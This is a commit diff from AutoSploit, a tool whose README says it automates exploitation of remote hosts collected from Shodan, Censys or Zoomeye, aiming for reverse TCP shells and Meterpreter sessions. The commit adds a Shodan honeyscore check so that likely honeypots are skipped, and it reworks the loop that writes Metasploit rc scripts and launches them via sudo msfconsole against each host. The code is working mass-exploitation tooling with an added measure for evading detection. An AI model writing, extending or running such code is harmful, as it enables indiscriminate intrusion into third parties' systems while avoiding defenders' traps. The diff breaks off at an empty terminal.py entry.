creates a new banner because we're sexy, fixes the NoneType issue, creates a honeypot check, implements the check in cmd line and terminal, bumps version number

Ekultek · Ekultek · commit 4b463207031c · 2019-04-11T15:35:37.000-05:00
diff --git a/README.md b/README.md
@@ -1,5 +1,5 @@
-# AutoSploit
-
+<center><img src="https://user-images.githubusercontent.com/14183473/55991044-e9317000-5c6e-11e9-8730-a2e9d5c3ea68.jpg"></image></center>
+<br><br>
 As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started
 
 **Operational Security Consideration**
diff --git a/api_calls/honeyscore_hook.py b/api_calls/honeyscore_hook.py
@@ -0,0 +1,22 @@
+import requests
+from bs4 import BeautifulSoup
+
+
+class HoneyHook(object):
+
+    def __init__(self, ip_addy, api_key):
+        self.ip = ip_addy
+        self.api_key = api_key
+        self.url = "https://api.shodan.io/labs/honeyscore/{ip}?key={key}"
+        self.headers = {
+            "Referer": "https://honeyscore.shodan.io/",
+            "Origin": "https://honeyscore.shodan.io"
+        }
+
+    def make_request(self):
+        try:
+            req = requests.get(self.url.format(ip=self.ip, key=self.api_key), headers=self.headers)
+            honeyscore = float(req.content)
+        except Exception:
+            honeyscore = 0.0
+        return honeyscore
diff --git a/lib/banner.py b/lib/banner.py
@@ -1,7 +1,7 @@
 import os
 import random
 
-VERSION = "3.0.3"
+VERSION = "3.1"
 
 
 def banner_1(line_sep="#--", space=" " * 30):
diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py
@@ -68,6 +68,8 @@ def optparser():
                              help="Do not launch metasploit's exploits. Do everything else. msfconsole is never called.")
         exploit.add_argument("-f", "--exploit-file-to-use", metavar="PATH", dest="exploitFile",
                              help="Run AutoSploit with provided exploit JSON file.")
+        exploit.add_argument("-H", "--is-honeypot", type=float, default=1000, dest="checkIfHoneypot", metavar="HONEY-SCORE",
+                             help="Determine if the host is a honeypot or not")
 
         misc = parser.add_argument_group("misc arguments", "arguments that don't fit anywhere else")
         misc.add_argument("--ruby-exec", action="store_true", dest="rubyExecutableNeeded",
@@ -218,11 +220,18 @@ def single_run_args(opt, keys, loaded_modules):
             hosts = open(lib.settings.HOST_FILE).readlines()
             if opt.whitelist:
                 hosts = lib.exploitation.exploiter.whitelist_wash(hosts, whitelist_file=opt.whitelist)
+            if opt.checkIfHoneypot != 1000:
+                check_pot = True
+            else:
+                check_pot = False
             lib.exploitation.exploiter.AutoSploitExploiter(
                 opt.msfConfig,
                 loaded_modules,
                 hosts,
                 ruby_exec=opt.rubyExecutableNeeded,
                 msf_path=opt.pathToFramework,
-                dryRun=opt.dryRun
+                dryRun=opt.dryRun,
+                shodan_token=keys["shodan"][0],
+                check_honey=check_pot,
+                compare_honey=opt.checkIfHoneypot
             ).start_exploit()
diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py
@@ -10,6 +10,7 @@
 
 import lib.settings
 import lib.output
+import api_calls.honeyscore_hook
 
 
 def whitelist_wash(hosts, whitelist_file):
@@ -48,6 +49,9 @@ def __init__(self, configuration, all_modules, hosts=None, **kwargs):
         self.ruby_exec = kwargs.get("ruby_exec", False)
         self.msf_path = kwargs.get("msf_path", None)
         self.dry_run = kwargs.get("dryRun", False)
+        self.check_honey = kwargs.get("check_honey", False)
+        self.shodan_token = kwargs.get("shodan_token", None)
+        self.compare_honey = kwargs.get("compare_honey", 0.0)
 
     def view_sorted(self):
         """
@@ -100,103 +104,120 @@ def start_exploit(self, sep="*" * 10):
 
         win_total = 0
         fail_total = 0
+        skip_amount = 0
 
         for host in self.hosts:
-            current_host_path = path.join(current_run_path, host.strip())
-            makedirs(current_host_path)
-
-            for mod in self.mods:
-                if not self.dry_run:
-                    lib.output.info(
-                        "launching exploit '{}' against host '{}'".format(
-                            mod.strip(), host.strip()
+            host = host.strip()
+            if self.check_honey:
+                lib.output.misc_info("checking if {} is a honeypot".format(host))
+                honey_score = api_calls.honeyscore_hook.HoneyHook(host, self.shodan_token).make_request()
+                if honey_score >= self.compare_honey:
+                    lib.output.warning(
+                        "awh shit, this returned a honeypot score of {}, lets not and say we did".format(honey_score)
+                    )
+                    skip = True
+                    skip_amount += 1
+                else:
+                    skip = False
+            else:
+                skip = False
+
+            if not skip:
+                current_host_path = path.join(current_run_path, host.strip())
+                makedirs(current_host_path)
+
+                for mod in self.mods:
+                    if not self.dry_run:
+                        lib.output.info(
+                            "launching exploit '{}' against host '{}'".format(
+                                mod.strip(), host.strip()
+                            )
                         )
+
+                    cmd_template = (
+                        "sudo {use_ruby} {msf_path} -r {rc_script_path} -q"
                     )
 
-                cmd_template = (
-                    "sudo {use_ruby} {msf_path} -r {rc_script_path} -q"
-                )
-
-                use_ruby = "ruby" if self.ruby_exec else ""
-                msf_path = self.msf_path if self.msf_path is not None else "msfconsole"
-
-                # What's the point of having a workspace if you overwrite it every fucking time..
-                rc_script_template = (
-                    "workspace -a {workspace}\n"
-                    "use {module_name}\n"
-                    "setg lhost {lhost}\n"
-                    "setg lport {lport}\n"
-                    "setg verbose true\n"
-                    "setg threads 20\n"
-                    "set rhost {rhost}\n"
-                    "set rhosts {rhosts}\n"
-                    "run -z\n"
-                    "exit -y\n"
-                )
-
-                module_name = mod.strip()
-                workspace = self.configuration[0]
-                lhost = self.configuration[1]
-                lport = self.configuration[2]
-                rhost = host.strip()
-
-                current_rc_script_path = path.join(current_host_path, mod.replace("/", '-').strip())
-                with open(current_rc_script_path, 'w') as f:
-
-                    f.writelines(rc_script_template.format(
-                        module_name=module_name,
-                        workspace=workspace,
-                        lhost=lhost,
-                        lport=lport,
-                        rhost=rhost,
-                        rhosts=rhost
-                    ))
-
-                with open(report_path, 'a') as f:
-
-                    cmd = cmd_template.format(
-                        use_ruby=use_ruby,
-                        msf_path=msf_path,
-                        rc_script_path=current_rc_script_path
+                    use_ruby = "ruby" if self.ruby_exec else ""
+                    msf_path = self.msf_path if self.msf_path is not None else "msfconsole"
+
+                    # What's the point of having a workspace if you overwrite it every fucking time..
+                    rc_script_template = (
+                        "workspace -a {workspace}\n"
+                        "use {module_name}\n"
+                        "setg lhost {lhost}\n"
+                        "setg lport {lport}\n"
+                        "setg verbose true\n"
+                        "setg threads 20\n"
+                        "set rhost {rhost}\n"
+                        "set rhosts {rhosts}\n"
+                        "run -z\n"
+                        "exit -y\n"
                     )
 
-                    output = [""]
-                    if not self.dry_run:
-                        output = lib.settings.cmdline(cmd)
-
-                    ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
-                    msf_output_lines = [ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]
-
-                    msf_wins = [x for x in msf_output_lines if re.search('\[\+\]', x) or
-                                             'Meterpreter' in x or
-                                             'Session' in x or
-                                             'Sending stage' in x]
-
-                    msf_fails = [x for x in msf_output_lines if re.search('\[-\]', x)]
-
-                    if len(msf_wins):
-                        win_total += 1
-                    if len(msf_fails):
-                        fail_total += 1
-
-                    csv_file = csv.writer(f, quoting=csv.QUOTE_ALL)
-                    csv_file.writerow([rhost,
-                                       today_printable,
-                                       module_name,
-                                       lhost,
-                                       lport,
-                                       linesep.join(msf_wins),
-                                       linesep.join(msf_fails),
-                                       linesep.join(msf_output_lines)])
-
-        print()
+                    module_name = mod.strip()
+                    workspace = self.configuration[0]
+                    lhost = self.configuration[1]
+                    lport = self.configuration[2]
+                    rhost = host.strip()
+
+                    current_rc_script_path = path.join(current_host_path, mod.replace("/", '-').strip())
+                    with open(current_rc_script_path, 'w') as f:
+
+                        f.writelines(rc_script_template.format(
+                            module_name=module_name,
+                            workspace=workspace,
+                            lhost=lhost,
+                            lport=lport,
+                            rhost=rhost,
+                            rhosts=rhost
+                        ))
+
+                    with open(report_path, 'a') as f:
+
+                        cmd = cmd_template.format(
+                            use_ruby=use_ruby,
+                            msf_path=msf_path,
+                            rc_script_path=current_rc_script_path
+                        )
+
+                        output = [""]
+                        if not self.dry_run:
+                            output = lib.settings.cmdline(cmd)
+
+                        ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
+                        msf_output_lines = [ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]
+
+                        msf_wins = [x for x in msf_output_lines if re.search('\[\+\]', x) or
+                                                 'Meterpreter' in x or
+                                                 'Session' in x or
+                                                 'Sending stage' in x]
+
+                        msf_fails = [x for x in msf_output_lines if re.search('\[-\]', x)]
+
+                        if len(msf_wins):
+                            win_total += 1
+                        if len(msf_fails):
+                            fail_total += 1
+
+                        csv_file = csv.writer(f, quoting=csv.QUOTE_ALL)
+                        csv_file.writerow([rhost,
+                                           today_printable,
+                                           module_name,
+                                           lhost,
+                                           lport,
+                                           linesep.join(msf_wins),
+                                           linesep.join(msf_fails),
+                                           linesep.join(msf_output_lines)])
+
+        print("")
         lib.output.info("{}RESULTS{}".format(sep, sep))
 
         if self.dry_run:
             lib.output.info("\tDRY RUN!")
             lib.output.info("\t0 exploits run against {} hosts.".format(len(self.hosts)))
         else:
-            lib.output.info("\t{} exploits run against {} hosts.".format(len(self.mods), len(self.hosts)))
+            lib.output.info("\t{} exploits run against {} hosts.".format(len(self.mods), len(self.hosts) - skip_amount))
             lib.output.info("\t{} exploit successful (Check report.csv to validate!).".format(win_total))
             lib.output.info("\t{} exploit failed.".format(fail_total))
 
diff --git a/lib/term/terminal.py b/lib/term/terminal.py
